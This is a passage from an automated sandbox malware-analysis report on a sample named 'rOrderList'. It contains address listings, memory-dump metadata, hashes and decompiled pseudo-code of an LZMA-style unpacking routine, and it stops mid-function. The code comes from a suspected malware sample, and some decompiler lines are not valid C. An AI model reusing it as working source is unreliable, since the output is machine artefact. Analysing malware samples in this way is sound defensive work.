                                                                                      0x0040709a
                                                                                      0x0040709a
                                                                                      0x0040709b
                                                                                      0x0040709e
                                                                                      0x004070a5
                                                                                      0x004070a8
                                                                                      0x004070b6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040738c
                                                                                      0x0040738c
                                                                                      0x0040738f
                                                                                      0x00407396
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040739b
                                                                                      0x0040739b
                                                                                      0x0040739f
                                                                                      0x004074d7
                                                                                      0x00000000
                                                                                      0x004074d7
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x004073ab
                                                                                      0x004073af
                                                                                      0x004073b2
                                                                                      0x004073b8
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073bd
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c3
                                                                                      0x004073c3
                                                                                      0x004073c7
                                                                                      0x00407427
                                                                                      0x0040742a
                                                                                      0x0040742f
                                                                                      0x00407430
                                                                                      0x00407432
                                                                                      0x00407434
                                                                                      0x00407437
                                                                                      0x00000000
                                                                                      0x00407437
                                                                                      0x004073c9
                                                                                      0x004073cf
                                                                                      0x004073d2
                                                                                      0x004073d5
                                                                                      0x004073d8
                                                                                      0x004073db
                                                                                      0x004073de
                                                                                      0x004073e1
                                                                                      0x004073e4
                                                                                      0x004073e7
                                                                                      0x004073ea
                                                                                      0x00407403
                                                                                      0x00407406
                                                                                      0x00407409
                                                                                      0x0040740c
                                                                                      0x00407410
                                                                                      0x00407412
                                                                                      0x00407412
                                                                                      0x00407413
                                                                                      0x00407416
                                                                                      0x004073ec
                                                                                      0x004073ec
                                                                                      0x004073f4
                                                                                      0x004073f9
                                                                                      0x004073fb
                                                                                      0x004073fe
                                                                                      0x004073fe
                                                                                      0x00407419
                                                                                      0x00407420
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x004070be
                                                                                      0x004070c1
                                                                                      0x004070f7
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x0040722a
                                                                                      0x0040722a
                                                                                      0x0040722d
                                                                                      0x0040722f
                                                                                      0x004074b9
                                                                                      0x00000000
                                                                                      0x004074b9
                                                                                      0x00407235
                                                                                      0x00407238
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040723e
                                                                                      0x00407242
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00000000
                                                                                      0x00407245
                                                                                      0x004070c3
                                                                                      0x004070c5
                                                                                      0x004070c7
                                                                                      0x004070c9
                                                                                      0x004070cc
                                                                                      0x004070cd
                                                                                      0x004070cf
                                                                                      0x004070d1
                                                                                      0x004070d4
                                                                                      0x004070d7
                                                                                      0x004070ed
                                                                                      0x004070f2
                                                                                      0x0040712a
                                                                                      0x0040712a
                                                                                      0x0040712e
                                                                                      0x0040715a
                                                                                      0x0040715c
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407169
                                                                                      0x0040716e
                                                                                      0x0040716e
                                                                                      0x00407170
                                                                                      0x00407173
                                                                                      0x0040717a
                                                                                      0x0040717d
                                                                                      0x004071aa
                                                                                      0x004071aa
                                                                                      0x004071ad
                                                                                      0x004071b0
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00000000
                                                                                      0x00407224
                                                                                      0x004071b2
                                                                                      0x004071b8
                                                                                      0x004071bb
                                                                                      0x004071be
                                                                                      0x004071c1
                                                                                      0x004071c4
                                                                                      0x004071c7
                                                                                      0x004071ca
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d3
                                                                                      0x004071ec
                                                                                      0x004071ee
                                                                                      0x004071f1
                                                                                      0x004071f2
                                                                                      0x004071f5
                                                                                      0x004071f7
                                                                                      0x004071fa
                                                                                      0x004071fc
                                                                                      0x004071fe
                                                                                      0x00407201
                                                                                      0x00407203
                                                                                      0x00407206
                                                                                      0x0040720a
                                                                                      0x0040720c
                                                                                      0x0040720c
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x004071d5
                                                                                      0x004071d5
                                                                                      0x004071dd
                                                                                      0x004071e2
                                                                                      0x004071e4
                                                                                      0x004071e7
                                                                                      0x004071e7
                                                                                      0x00407216
                                                                                      0x0040721d
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x0040721d
                                                                                      0x00407130
                                                                                      0x00407133
                                                                                      0x00407135
                                                                                      0x00407138
                                                                                      0x0040713b
                                                                                      0x0040713e
                                                                                      0x00407140
                                                                                      0x00407143
                                                                                      0x00407146
                                                                                      0x00407146
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x0040714c
                                                                                      0x00407153
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00407153
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070de
                                                                                      0x004070e1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e40
                                                                                      0x00406e40
                                                                                      0x00406e44
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00406e4a
                                                                                      0x00406e4d
                                                                                      0x00406e50
                                                                                      0x00406e53
                                                                                      0x00406e56
                                                                                      0x00406e59
                                                                                      0x00406e5c
                                                                                      0x00406e5e
                                                                                      0x00406e61
                                                                                      0x00406e64
                                                                                      0x00406e67
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x0040724c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407252
                                                                                      0x00407255
                                                                                      0x00407258
                                                                                      0x0040725b
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x00407260
                                                                                      0x00407263
                                                                                      0x00407266
                                                                                      0x00407269
                                                                                      0x0040726c
                                                                                      0x0040726f
                                                                                      0x00407270
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407275
                                                                                      0x00407278
                                                                                      0x0040727b
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x00407285
                                                                                      0x00407287
                                                                                      0x0040728a
                                                                                      0x00000000
                                                                                      0x0040728c
                                                                                      0x00000000
                                                                                      0x0040728c
                                                                                      0x0040728a
                                                                                      0x004074bf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406aee

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                                                                                      • Instruction ID: f684c89e7032feabc3e3bde7c6855c560f6d73b68505d9943badace2bdbe07f8
                                                                                      • Opcode Fuzzy Hash: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                                                                                      • Instruction Fuzzy Hash: CD814771D04228CFDF24CFA8C944BADBBB1FB44305F25816AD856BB281C7786986DF05
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E00406AAC(void* __ecx) {
                                                                                      				void* _v8;
                                                                                      				void* _v12;
                                                                                      				signed int _v16;
                                                                                      				unsigned int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				signed int _v48;
                                                                                      				signed int _v52;
                                                                                      				signed int _v56;
                                                                                      				signed int _v60;
                                                                                      				signed int _v64;
                                                                                      				signed int _v68;
                                                                                      				signed int _v72;
                                                                                      				signed int _v76;
                                                                                      				signed int _v80;
                                                                                      				signed int _v84;
                                                                                      				signed int _v88;
                                                                                      				signed int _v92;
                                                                                      				signed int _v95;
                                                                                      				signed int _v96;
                                                                                      				signed int _v100;
                                                                                      				signed int _v104;
                                                                                      				signed int _v108;
                                                                                      				signed int _v112;
                                                                                      				signed int _v116;
                                                                                      				signed int _v120;
                                                                                      				intOrPtr _v124;
                                                                                      				signed int _v128;
                                                                                      				signed int _v132;
                                                                                      				signed int _v136;
                                                                                      				void _v140;
                                                                                      				void* _v148;
                                                                                      				signed int _t537;
                                                                                      				signed int _t538;
                                                                                      				signed int _t572;
                                                                                      
                                                                                      				_t572 = 0x22;
                                                                                      				_v148 = __ecx;
                                                                                      				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                      				if(_v52 == 0xffffffff) {
                                                                                      					return 1;
                                                                                      				}
                                                                                      				while(1) {
                                                                                      					L3:
                                                                                      					_t537 = _v140;
                                                                                      					if(_t537 > 0x1c) {
                                                                                      						break;
                                                                                      					}
                                                                                      					switch( *((intOrPtr*)(_t537 * 4 +  &M004074FE))) {
                                                                                      						case 0:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v116 = _v116 + 1;
                                                                                      							_t537 =  *_v116;
                                                                                      							__eflags = _t537 - 0xe1;
                                                                                      							if(_t537 > 0xe1) {
                                                                                      								goto L174;
                                                                                      							}
                                                                                      							_t542 = _t537 & 0x000000ff;
                                                                                      							_push(0x2d);
                                                                                      							asm("cdq");
                                                                                      							_pop(_t576);
                                                                                      							_push(9);
                                                                                      							_pop(_t577);
                                                                                      							_t622 = _t542 / _t576;
                                                                                      							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                      							asm("cdq");
                                                                                      							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                      							_v64 = _t617;
                                                                                      							_v32 = (1 << _t622) - 1;
                                                                                      							_v28 = (1 << _t544 / _t577) - 1;
                                                                                      							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                      							__eflags = 0x600 - _v124;
                                                                                      							if(0x600 == _v124) {
                                                                                      								L12:
                                                                                      								__eflags = _t625;
                                                                                      								if(_t625 == 0) {
                                                                                      									L14:
                                                                                      									_v76 = _v76 & 0x00000000;
                                                                                      									_v68 = _v68 & 0x00000000;
                                                                                      									goto L17;
                                                                                      								} else {
                                                                                      									goto L13;
                                                                                      								}
                                                                                      								do {
                                                                                      									L13:
                                                                                      									_t625 = _t625 - 1;
                                                                                      									__eflags = _t625;
                                                                                      									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                      								} while (_t625 != 0);
                                                                                      								goto L14;
                                                                                      							}
                                                                                      							__eflags = _v8;
                                                                                      							if(_v8 != 0) {
                                                                                      								GlobalFree(_v8);
                                                                                      							}
                                                                                      							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      							__eflags = _t537;
                                                                                      							_v8 = _t537;
                                                                                      							if(_t537 == 0) {
                                                                                      								goto L174;
                                                                                      							} else {
                                                                                      								_v124 = 0x600;
                                                                                      								goto L12;
                                                                                      							}
                                                                                      						case 1:
                                                                                      							L15:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 1;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                      							_v116 = _v116 + 1;
                                                                                      							_t50 =  &_v76;
                                                                                      							 *_t50 = _v76 + 1;
                                                                                      							__eflags =  *_t50;
                                                                                      							L17:
                                                                                      							__eflags = _v76 - 4;
                                                                                      							if(_v76 < 4) {
                                                                                      								goto L15;
                                                                                      							}
                                                                                      							_t550 = _v68;
                                                                                      							__eflags = _t550 - _v120;
                                                                                      							if(_t550 == _v120) {
                                                                                      								L22:
                                                                                      								_v76 = 5;
                                                                                      								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                      								goto L25;
                                                                                      							}
                                                                                      							__eflags = _v12;
                                                                                      							_v120 = _t550;
                                                                                      							if(_v12 != 0) {
                                                                                      								GlobalFree(_v12);
                                                                                      							}
                                                                                      							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                      							__eflags = _t537;
                                                                                      							_v12 = _t537;
                                                                                      							if(_t537 == 0) {
                                                                                      								goto L174;
                                                                                      							} else {
                                                                                      								goto L22;
                                                                                      							}
                                                                                      						case 2:
                                                                                      							L26:
                                                                                      							_t557 = _v100 & _v32;
                                                                                      							_v136 = 6;
                                                                                      							_v80 = _t557;
                                                                                      							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                      							goto L135;
                                                                                      						case 3:
                                                                                      							L23:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 3;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_t72 =  &_v116;
                                                                                      							 *_t72 = _v116 + 1;
                                                                                      							__eflags =  *_t72;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							L25:
                                                                                      							_v76 = _v76 - 1;
                                                                                      							__eflags = _v76;
                                                                                      							if(_v76 != 0) {
                                                                                      								goto L23;
                                                                                      							}
                                                                                      							goto L26;
                                                                                      						case 4:
                                                                                      							L136:
                                                                                      							_t559 =  *_t626;
                                                                                      							_t610 = _t559 & 0x0000ffff;
                                                                                      							_t591 = (_v20 >> 0xb) * _t610;
                                                                                      							__eflags = _v16 - _t591;
                                                                                      							if(_v16 >= _t591) {
                                                                                      								_v20 = _v20 - _t591;
                                                                                      								_v16 = _v16 - _t591;
                                                                                      								_v68 = 1;
                                                                                      								_t560 = _t559 - (_t559 >> 5);
                                                                                      								__eflags = _t560;
                                                                                      								 *_t626 = _t560;
                                                                                      							} else {
                                                                                      								_v20 = _t591;
                                                                                      								_v68 = _v68 & 0x00000000;
                                                                                      								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                      							}
                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                      							if(_v20 >= 0x1000000) {
                                                                                      								goto L142;
                                                                                      							} else {
                                                                                      								goto L140;
                                                                                      							}
                                                                                      						case 5:
                                                                                      							L140:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 5;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							_v20 = _v20 << 8;
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_t464 =  &_v116;
                                                                                      							 *_t464 = _v116 + 1;
                                                                                      							__eflags =  *_t464;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							L142:
                                                                                      							_t561 = _v136;
                                                                                      							goto L143;
                                                                                      						case 6:
                                                                                      							__edx = 0;
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								__eax = _v8;
                                                                                      								__ecx = _v60;
                                                                                      								_v56 = 1;
                                                                                      								_v136 = 7;
                                                                                      								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                      								goto L135;
                                                                                      							}
                                                                                      							__eax = _v96 & 0x000000ff;
                                                                                      							__esi = _v100;
                                                                                      							__cl = 8;
                                                                                      							__cl = 8 - _v64;
                                                                                      							__esi = _v100 & _v28;
                                                                                      							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                      							__ecx = _v64;
                                                                                      							__esi = (_v100 & _v28) << 8;
                                                                                      							__ecx = _v8;
                                                                                      							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                      							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                      							__eflags = _v60 - 4;
                                                                                      							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                      							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                      							if(_v60 >= 4) {
                                                                                      								__eflags = _v60 - 0xa;
                                                                                      								if(_v60 >= 0xa) {
                                                                                      									_t103 =  &_v60;
                                                                                      									 *_t103 = _v60 - 6;
                                                                                      									__eflags =  *_t103;
                                                                                      								} else {
                                                                                      									_v60 = _v60 - 3;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_v60 = 0;
                                                                                      							}
                                                                                      							__eflags = _v56 - __edx;
                                                                                      							if(_v56 == __edx) {
                                                                                      								__ebx = 0;
                                                                                      								__ebx = 1;
                                                                                      								goto L63;
                                                                                      							}
                                                                                      							__eax = _v24;
                                                                                      							__eax = _v24 - _v48;
                                                                                      							__eflags = __eax - _v120;
                                                                                      							if(__eax >= _v120) {
                                                                                      								__eax = __eax + _v120;
                                                                                      								__eflags = __eax;
                                                                                      							}
                                                                                      							__ecx = _v12;
                                                                                      							__ebx = 0;
                                                                                      							__ebx = 1;
                                                                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                      							goto L43;
                                                                                      						case 7:
                                                                                      							__eflags = _v68 - 1;
                                                                                      							if(_v68 != 1) {
                                                                                      								__eax = _v40;
                                                                                      								_v132 = 0x16;
                                                                                      								_v36 = _v40;
                                                                                      								__eax = _v44;
                                                                                      								_v40 = _v44;
                                                                                      								__eax = _v48;
                                                                                      								_v44 = _v48;
                                                                                      								__eax = 0;
                                                                                      								__eflags = _v60 - 7;
                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      								__al = __al & 0x000000fd;
                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                      								__eax = _v8;
                                                                                      								__eax = _v8 + 0x664;
                                                                                      								__eflags = __eax;
                                                                                      								_v92 = __eax;
                                                                                      								goto L71;
                                                                                      							}
                                                                                      							__eax = _v8;
                                                                                      							__ecx = _v60;
                                                                                      							_v136 = 8;
                                                                                      							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                      							goto L135;
                                                                                      						case 8:
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								__eax = _v8;
                                                                                      								__ecx = _v60;
                                                                                      								_v136 = 0xa;
                                                                                      								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                      							} else {
                                                                                      								__eax = _v60;
                                                                                      								__ecx = _v8;
                                                                                      								__eax = _v60 + 0xf;
                                                                                      								_v136 = 9;
                                                                                      								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                      								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                      							}
                                                                                      							goto L135;
                                                                                      						case 9:
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								goto L92;
                                                                                      							}
                                                                                      							__eflags = _v100;
                                                                                      							if(_v100 == 0) {
                                                                                      								goto L174;
                                                                                      							}
                                                                                      							__eax = 0;
                                                                                      							__eflags = _v60 - 7;
                                                                                      							_t264 = _v60 - 7 >= 0;
                                                                                      							__eflags = _t264;
                                                                                      							0 | _t264 = _t264 + _t264 + 9;
                                                                                      							_v60 = _t264 + _t264 + 9;
                                                                                      							goto L78;
                                                                                      						case 0xa:
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								__eax = _v8;
                                                                                      								__ecx = _v60;
                                                                                      								_v136 = 0xb;
                                                                                      								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                      								goto L135;
                                                                                      							}
                                                                                      							__eax = _v44;
                                                                                      							goto L91;
                                                                                      						case 0xb:
                                                                                      							__eflags = _v68;
                                                                                      							if(_v68 != 0) {
                                                                                      								__ecx = _v40;
                                                                                      								__eax = _v36;
                                                                                      								_v36 = _v40;
                                                                                      							} else {
                                                                                      								__eax = _v40;
                                                                                      							}
                                                                                      							__ecx = _v44;
                                                                                      							_v40 = _v44;
                                                                                      							L91:
                                                                                      							__ecx = _v48;
                                                                                      							_v48 = __eax;
                                                                                      							_v44 = _v48;
                                                                                      							L92:
                                                                                      							__eax = _v8;
                                                                                      							_v132 = 0x15;
                                                                                      							__eax = _v8 + 0xa68;
                                                                                      							_v92 = _v8 + 0xa68;
                                                                                      							goto L71;
                                                                                      						case 0xc:
                                                                                      							L102:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 0xc;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							__ecx = _v116;
                                                                                      							__eax = _v16;
                                                                                      							_v20 = _v20 << 8;
                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							_t340 =  &_v116;
                                                                                      							 *_t340 = _v116 + 1;
                                                                                      							__eflags =  *_t340;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							__eax = _v48;
                                                                                      							goto L104;
                                                                                      						case 0xd:
                                                                                      							L39:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 0xd;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							__ecx = _v116;
                                                                                      							__eax = _v16;
                                                                                      							_v20 = _v20 << 8;
                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							_t127 =  &_v116;
                                                                                      							 *_t127 = _v116 + 1;
                                                                                      							__eflags =  *_t127;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							L41:
                                                                                      							__eax = _v68;
                                                                                      							__eflags = _v76 - _v68;
                                                                                      							if(_v76 != _v68) {
                                                                                      								goto L50;
                                                                                      							}
                                                                                      							__eflags = __ebx - 0x100;
                                                                                      							if(__ebx >= 0x100) {
                                                                                      								goto L56;
                                                                                      							}
                                                                                      							L43:
                                                                                      							__eax = _v95 & 0x000000ff;
                                                                                      							_v95 = _v95 << 1;
                                                                                      							__ecx = _v92;
                                                                                      							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                      							_v76 = __eax;
                                                                                      							__eax = __eax + 1;
                                                                                      							__eax = __eax << 8;
                                                                                      							__eax = __eax + __ebx;
                                                                                      							__esi = _v92 + __eax * 2;
                                                                                      							_v20 = _v20 >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							_v88 = __esi;
                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                      							__ecx = (_v20 >> 0xb) * __edx;
                                                                                      							__eflags = _v16 - __ecx;
                                                                                      							if(_v16 >= __ecx) {
                                                                                      								_v20 = _v20 - __ecx;
                                                                                      								_v16 = _v16 - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								_v68 = 1;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__eflags = __eax;
                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                      								 *__esi = __ax;
                                                                                      							} else {
                                                                                      								_v68 = _v68 & 0x00000000;
                                                                                      								_v20 = __ecx;
                                                                                      								0x800 = 0x800 - __edx;
                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                      							_v72 = __ebx;
                                                                                      							if(_v20 >= 0x1000000) {
                                                                                      								goto L41;
                                                                                      							} else {
                                                                                      								goto L39;
                                                                                      							}
                                                                                      						case 0xe:
                                                                                      							L48:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 0xe;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							__ecx = _v116;
                                                                                      							__eax = _v16;
                                                                                      							_v20 = _v20 << 8;
                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							_t161 =  &_v116;
                                                                                      							 *_t161 = _v116 + 1;
                                                                                      							__eflags =  *_t161;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							while(1) {
                                                                                      								L50:
                                                                                      								__eflags = __ebx - 0x100;
                                                                                      								if(__ebx >= 0x100) {
                                                                                      									break;
                                                                                      								}
                                                                                      								__eax = _v92;
                                                                                      								__edx = __ebx + __ebx;
                                                                                      								__ecx = _v20;
                                                                                      								__esi = __edx + __eax;
                                                                                      								__ecx = _v20 >> 0xb;
                                                                                      								__ax =  *__esi;
                                                                                      								_v88 = __esi;
                                                                                      								__edi = __ax & 0x0000ffff;
                                                                                      								__ecx = (_v20 >> 0xb) * __edi;
                                                                                      								__eflags = _v16 - __ecx;
                                                                                      								if(_v16 >= __ecx) {
                                                                                      									_v20 = _v20 - __ecx;
                                                                                      									_v16 = _v16 - __ecx;
                                                                                      									__cx = __ax;
                                                                                      									_t175 = __edx + 1; // 0x1
                                                                                      									__ebx = _t175;
                                                                                      									__cx = __ax >> 5;
                                                                                      									__eflags = __eax;
                                                                                      									 *__esi = __ax;
                                                                                      								} else {
                                                                                      									_v20 = __ecx;
                                                                                      									0x800 = 0x800 - __edi;
                                                                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      									__ebx = __ebx + __ebx;
                                                                                      									 *__esi = __cx;
                                                                                      								}
                                                                                      								__eflags = _v20 - 0x1000000;
                                                                                      								_v72 = __ebx;
                                                                                      								if(_v20 >= 0x1000000) {
                                                                                      									continue;
                                                                                      								} else {
                                                                                      									goto L48;
                                                                                      								}
                                                                                      							}
                                                                                      							L56:
                                                                                      							_t178 =  &_v56;
                                                                                      							 *_t178 = _v56 & 0x00000000;
                                                                                      							__eflags =  *_t178;
                                                                                      							goto L57;
                                                                                      						case 0xf:
                                                                                      							L60:
                                                                                      							__eflags = _v112;
                                                                                      							if(_v112 == 0) {
                                                                                      								_v140 = 0xf;
                                                                                      								goto L173;
                                                                                      							}
                                                                                      							__ecx = _v116;
                                                                                      							__eax = _v16;
                                                                                      							_v20 = _v20 << 8;
                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                      							_v112 = _v112 - 1;
                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							_t208 =  &_v116;
                                                                                      							 *_t208 = _v116 + 1;
                                                                                      							__eflags =  *_t208;
                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                      							L62:
                                                                                      							__eflags = __ebx - 0x100;
                                                                                      							if(__ebx >= 0x100) {
                                                                                      								L57:
                                                                                      								__al = _v72;
                                                                                      								_v96 = _v72;
                                                                                      								goto L58;
                                                                                      							}
                                                                                      							L63:
                                                                                      							__eax = _v92;
                                                                                      							__edx = __ebx + __ebx;
                                                                                      							__ecx = _v20;
                                                                                      							__esi = __edx + __eax;
                                                                                      							__ecx = _v20 >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							_v88 = __esi;
